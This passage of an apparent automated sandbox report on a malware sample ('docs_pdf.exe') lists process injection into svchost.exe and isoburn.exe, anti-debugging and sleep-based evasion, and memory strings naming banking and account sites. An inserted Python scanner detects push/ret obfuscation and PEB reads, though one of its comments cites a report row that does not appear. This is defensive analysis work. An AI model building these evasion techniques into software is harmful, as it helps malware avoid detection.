            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004162D3 push esi; retf 2_2_004162DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403AB0 push eax; ret 2_2_00403AB2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00407C44 pushfd ; retf 2_2_00407C45
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041856F push edx; ret 2_2_00418572
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040ADF5 push eax; retf 2_2_0040AE11
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00405776 pushad ; retf 2_2_00405785
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411F7B push ebx; retf 2_2_00411F7E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370225F pushad ; ret 2_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037027FA pushad ; ret 2_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx 2_2_037309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370283D push eax; iretd 2_2_03702858
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A36381 push 72B82297h; ret 4_2_03A3640A
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A2534D pushfd ; retf 4_2_03A25359
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A2F2A0 push ebx; retf 4_2_03A2F2A3
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A22A9B pushad ; retf 4_2_03A22AAA
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A2811A push eax; retf 4_2_03A28136
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A35894 push edx; ret 4_2_03A35897
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A24F69 pushfd ; retf 4_2_03A24F6A
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A3A655 push edi; retf 4_2_03A3A65F
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A25CDB push ecx; retf 4_2_03A25CE7
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A36476 push ecx; iretd 4_2_03A36477
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048327FA pushad ; ret 5_2_048327F9
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0483225F pushad ; ret 5_2_048327F9
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0483283D push eax; iretd 5_2_04832858
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048609AD push ecx; mov dword ptr [esp], ecx 5_2_048609B6
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_00804191 pushfd ; retf 5_2_00804192
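The push/ret rows above (a pushed address, register or flags value followed by ret, retf or iretd, so that the processor "returns" to a target the code chose instead of to a call site) and the fs:[00000030h] reads the report lists further down under anti-debugging (in a 32-bit process fs:[30h] holds the PEB pointer, from which the BeingDebugged flag and the loader's module list are reached without calling any API) can both be located statically with a byte-pattern scan of a code region. The following Python is an added example written for this page, not Joe Sandbox code; the sample buffer is constructed by hand and the only facts it relies on are the standard x86 opcode encodings.

```python
"""Scan raw x86 code bytes for two patterns this report flags: 'push ...; ret'
(control-flow obfuscation) and reads of the PEB through fs:[30h] (used for
BeingDebugged checks and manual API resolution).

Added example for this page, not Joe Sandbox code; the sample buffer below
is constructed by hand.
"""
import re
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RETS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

# push imm32 (68 imm32) | push r32 (50+r) | pushfd (9C) | pushad (60),
# immediately followed by ret (C3), retf (CB) or iretd (CF).
PUSH_RET = re.compile(rb"(?:\x68.{4}|[\x50-\x57\x9c\x60])[\xc3\xcb\xcf]", re.DOTALL)
# mov eax, fs:[30h]  = 64 A1 30000000
# mov r32, fs:[30h]  = 64 8B modrm 30000000 with mod=00, rm=101 (disp32), reg = r32
PEB_READ = re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00")


def _describe_push(m: bytes) -> str:
    op, ret = m[0], RETS[m[-1]]
    if op == 0x68:
        return f"push 0x{struct.unpack('<I', m[1:5])[0]:08x}; {ret}"
    if op == 0x9C:
        return f"pushfd; {ret}"
    if op == 0x60:
        return f"pushad; {ret}"
    return f"push {REG32[op - 0x50]}; {ret}"


def _describe_peb(m: bytes) -> str:
    reg = "eax" if m[1] == 0xA1 else REG32[(m[2] >> 3) & 7]
    return f"mov {reg}, fs:[30h]"


def scan(code: bytes, base: int = 0):
    """Return sorted (address, kind, text) triples for every match in `code`.

    This is byte matching, not disassembly: a hit inside an immediate or a
    data blob is possible, so confirm each address in a disassembler.
    """
    hits = [(base + m.start(), "peb_read", _describe_peb(m.group()))
            for m in PEB_READ.finditer(code)]
    hits += [(base + m.start(), "push_ret", _describe_push(m.group()))
             for m in PUSH_RET.finditer(code)]
    return sorted(hits)


# Constructed sample: a normal prologue and epilogue around the patterns of interest.
SAMPLE = bytes.fromhex(
    "55 8b ec"              # push ebp; mov ebp, esp    (benign, must not match)
    "64 a1 30 00 00 00"     # mov eax, fs:[30h]         -> PEB
    "0f b6 40 02"           # movzx eax, byte [eax+2]   -> PEB.BeingDebugged
    "64 8b 0d 30 00 00 00"  # mov ecx, fs:[30h]
    "68 97 22 b8 72 c3"     # push 72B82297h; ret       (as in row 2_2_0041905C above)
    "9c cb"                 # pushfd; retf
    "51 cf"                 # push ecx; iretd
    "c9 c3"                 # leave; ret                (benign, must not match)
)

if __name__ == "__main__":
    for addr, kind, text in scan(SAMPLE, base=0x400000):
        print(f"{addr:#010x} {kind:9} {text}")
```

The `base` argument lets the scanner report virtual addresses in the same form as the report's function IDs when the buffer was dumped from a known load address; on a packed or hollowed image, scan the memory dump rather than the file on disk, since the patterns above live in the unpacked code.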
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_000F4A35
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001755FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_001755FD
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001133C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001133C7
            Source: C:\Users\user\Desktop\docs_pdf.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\isoburn.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\docs_pdf.exe | API/Special instruction interceptor: Address: 36E3204
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\isoburn.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E rdtsc 2_2_0377096E
            Source: C:\Windows\SysWOW64\isoburn.exe | Window / User API: threadDelayed 9846
            Source: C:\Users\user\Desktop\docs_pdf.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-99280
            Source: C:\Users\user\Desktop\docs_pdf.exe | API coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\isoburn.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780 | Thread sleep count: 126 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780 | Thread sleep time: -252000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780 | Thread sleep count: 9846 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1780 | Thread sleep time: -19692000s >= -30000s
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540 | Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540 | Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540 | Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540 | Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe TID: 1540 | Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe | Last function: Thread delayed (2 occurrences)
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00154696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00154696
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0015C93C FindFirstFileW,FindClose, 0_2_0015C93C
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0015C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0015C9C7
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0015F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0015F200
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0015F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0015F35D
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0015F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0015F65E
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00153A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00153A2B
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00153D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00153D4E
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0015BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0015BF27
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0081BF20 FindFirstFileW,FindNextFileW,FindClose, 5_2_0081BF20
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_000F4AFE
            Source: x1j09f428.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,116964
            Source: x1j09f428.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: x1j09f428.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: x1j09f428.5.dr | Binary or memory string: discord.comVMware20,11696487552f
            Source: x1j09f428.5.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: x1j09f428.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: x1j09f428.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: x1j09f428.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: x1j09f428.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: x1j09f428.5.dr | Binary or memory string: global block list test formVMware20,11696487552
            Source: x1j09f428.5.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,11696487552j
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,10
            Source: x1j09f428.5.dr | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: x1j09f428.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: x1j09f428.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hange Transaction PasswordVMware20,11696487552
            Source: x1j09f428.5.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: x1j09f428.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: teractivebrokers.co.inVMware20,11696487552d
            Source: x1j09f428.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: x1j09f428.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552e
            Source: x1j09f428.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: isoburn.exe, 00000005.00000002.4555382292.00000000078E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,1169648755
            Source: x1j09f428.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: x1j09f428.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: x1j09f428.5.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: x1j09f428.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: x1j09f428.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: x1j09f428.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: HDtHilbfKZE.exe, 00000007.00000002.4550659884.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
            Source: x1j09f428.5.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: x1j09f428.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: x1j09f428.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: x1j09f428.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: x1j09f428.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: x1j09f428.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: firefox.exe, 0000000A.00000002.2775753156.0000020038C0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
            Source: C:\Users\user\Desktop\docs_pdf.exe | API call chain: ExitProcess graph end node graph_0-98007
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\isoburn.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E rdtsc 2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417F93 LdrLoadDll, 2_2_00417F93
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001641FD BlockInput, 0_2_001641FD
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_000F3B4C
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00125CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00125CCC
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0016C304 LoadLibraryA,GetProcAddress, 0_2_0016C304
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_036E3470 mov eax, dword ptr fs:[00000030h] 0_2_036E3470
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_036E34D0 mov eax, dword ptr fs:[00000030h] 0_2_036E34D0
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_036E1E70 mov eax, dword ptr fs:[00000030h] 0_2_036E1E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h] 2_2_037D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h] 2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h] 2_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h] 2_2_037D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349 (15 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h] 2_2_0372C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h] 2_2_03750310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] 2_2_0376A30B (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0374E3F0 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h] 2_2_037663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
